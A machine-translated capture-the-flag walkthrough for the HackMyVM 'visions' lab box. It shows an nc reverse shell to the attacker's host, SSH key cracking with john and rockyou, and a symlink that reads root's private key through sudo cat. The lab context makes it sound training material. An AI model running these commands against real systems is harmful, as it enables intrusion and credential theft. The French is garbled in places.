当前位置:网站首页>Hackmyvm Target Series (3) - vues
Hackmyvm Target Series (3) - vues
2022-07-06 13:57:00 【La lune doit savoir ce que je veux dire.】
Un.、Collecte d'informations
Détecter d'abord le segment réseau,Obtenir l'hôte cible
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Ensuite, faites un balayage de port,DécouvertesshServices ethttpServices
nmap -sC -sV -p- 192.168.200.234
VisitehttpServices,Il n'y a qu'une image et un commentaire.
Ce commentaire semble être un indice,alicciaSupposons que ce soit un utilisateur
UtiliserdirsearchNumérisez le catalogue,Voir ce qu'il y a à gagner
dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502
Mais il n'y a rien
Selon ses indications, Télécharger l'image , Regardez les métadonnées de l'image
curl http://192.168.200.234/white.png -o white.png
./exiftool white.png
Comme le montre la figure, J'ai trouvé le mot de passe
Utilisation et téléchargement des outils :
ExifToolGuide de démarrage complet
alicia:ihaveadream
2.、Exploitation des vulnérabilités
Connexion réussie
Non trouvé dans le répertoire courant après être entré flag, J'ai lu un catalogue et j'ai trouvé 4Utilisateurs,Et aprèssophiaTrouvé dans le catalogueflag,Mais pas de permission,Ça ne marche pas..
Alors essayez d'en parler d'abord ?
sudo -l
Découvrez que l'utilisateur actuel peut emmaExécution de l'identité de l'utilisateurnc Sans mot de passe .
Dans ce cas,, Alors rebondissez d'abord shellEssaie..
kaliPort d'écoute supérieur
Ensuite, exécutez l'instruction suivante sur la machine cible
sudo -u emma nc 192.168.200.192 10000 -e /bin/bash
Accepté avec succèsshell,Utiliserpython Obtenir une interaction shell
python -c 'import pty; pty.spawn("/bin/bash")'
Trouvé dans le répertoire courantnote.txtDocumentation,Il se lit comme suit:.
Je ne peux m'empêcher de ???Je ne sais pas ce que ça veut dire..
Puis j'ai regardé de nouveau suidEtsudoDroit de rétractation, Il n'y a pas de percée .
J'ai vu le grand wp, Il a été constaté que certains outils de traitement d'images sont nécessaires
Après le téléchargement de l'image, Cliquez sur cette flèche .
Puis vous verrez le nom d'utilisateur et le mot de passe , C'est un vrai trou , Toutes les informations sont cachées dans cette image
sophia:seemstobeimpossible
Connexion réussie
L'utilisateur actuel peut utiliser n'importe quelle identité d'utilisateur catVue des commandes.invisibleDocumentation.Cela signifie que nous utilisonscat La commande peut être utilisée pour afficher le fichier avec rootAutorité.
Ouvre.,C'est l'utilisateur.isabella La clé privée de , Prenez - le et essayez
J'ai dû continuer à taper le mot de passe .
Ça ne peut que commencer à exploser
Peut être utiliséjohn the ripperEffectuer le dynamitage, Mais utilisez d'abord la commande suivante pour id_rsaConvertir enjohnReconnaissablehashValeur
python3 /usr/share/john/ssh2john.py id_rsa > crack.txt
J'utilise des scripts pour faire exploser .
rockyou.txt- Oui.kali Un dictionnaire que j'ai apporté avec moi ,/usr/share/wordlists/rockyou.txt.gz, Il faut le décompresser avant de l'utiliser ,Sinon, il y aura du désordre
gzip -d rockyou.txt.gz
Le mot de passe a explosé avec succès(Le mot de passe est1Plus de 10 000 lignes, Mais ici, à cause de l'écriture wp Je l'ai juste mis devant )
invisible
Comme le montre la figure,Connexion réussie
Commencez par en bas, Parce qu'on a changé de réseau ,Donc çaIPÇa a changé.
Trois、Augmentation des droits
Voyez ici s'il y a des commandes qui peuvent être utilisées pour soulever des droits
Mais il n'y a pas eu de percée
Et soudain, je me suis souvenu d'avant sophiaUtilisation par l'utilisateurcatLa commande lit.invisible Le fichier a rootPermissions, Puis - je utiliser isabellaL'utilisateur.invisibllaLien utilisateur versroot Et la clé privée de l'utilisateur ?
Créer un lien souple
ln -sf /root/.ssh/id_rsa .invisible
LirerootClé privée de l'utilisateur
sudo cat /home/isabella/.invisible
Il y a un petit problème à se connecter avec une clé privée ici , Les permissions trop élevées peuvent entraîner l'échec de la connexion .
Réduire les permissions ,Connectez - vous à nouveau
chmod 600 key
Connexion réussie,ObtenirrootAutorité
边栏推荐
- Experiment 9 input and output stream (excerpt)
- Using qcommonstyle to draw custom form parts
- MySQL lock summary (comprehensive and concise + graphic explanation)
- 撲克牌遊戲程序——人機對抗
- Meituan dynamic thread pool practice ideas, open source
- 强化學習基礎記錄
- 【MySQL数据库的学习】
- Canvas foundation 2 - arc - draw arc
- 仿牛客技术博客项目常见问题及解答(一)
- 实验四 数组
猜你喜欢
QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
Safe driving skills on ice and snow roads
Custom RPC project - frequently asked questions and explanations (Registration Center)
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
(原创)制作一个采用 LCD1602 显示的电子钟,在 LCD 上显示当前的时间。显示格式为“时时:分分:秒秒”。设有 4 个功能键k1~k4,功能如下:(1)k1——进入时间修改。
撲克牌遊戲程序——人機對抗
Renforcer les dossiers de base de l'apprentissage
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
7-5 走楼梯升级版(PTA程序设计)
3. Input and output functions (printf, scanf, getchar and putchar)
随机推荐
仿牛客技术博客项目常见问题及解答(二)
String ABC = new string ("ABC"), how many objects are created
SRC挖掘思路及方法
7-4 hash table search (PTA program design)
编写程序,模拟现实生活中的交通信号灯。
Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
Brief introduction to XHR - basic use of XHR
强化學習基礎記錄
Zatan 0516
实验九 输入输出流(节选)
Experiment 4 array
【数据库 三大范式】一看就懂
canvas基础2 - arc - 画弧线
[insert, modify and delete data in the headsong educator data table]
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
7-14 错误票据(PTA程序设计)
Write a program to simulate the traffic lights in real life.
HackMyvm靶机系列(3)-visions
HackMyvm靶机系列(4)-vulny
. Net6: develop modern 3D industrial software based on WPF (2)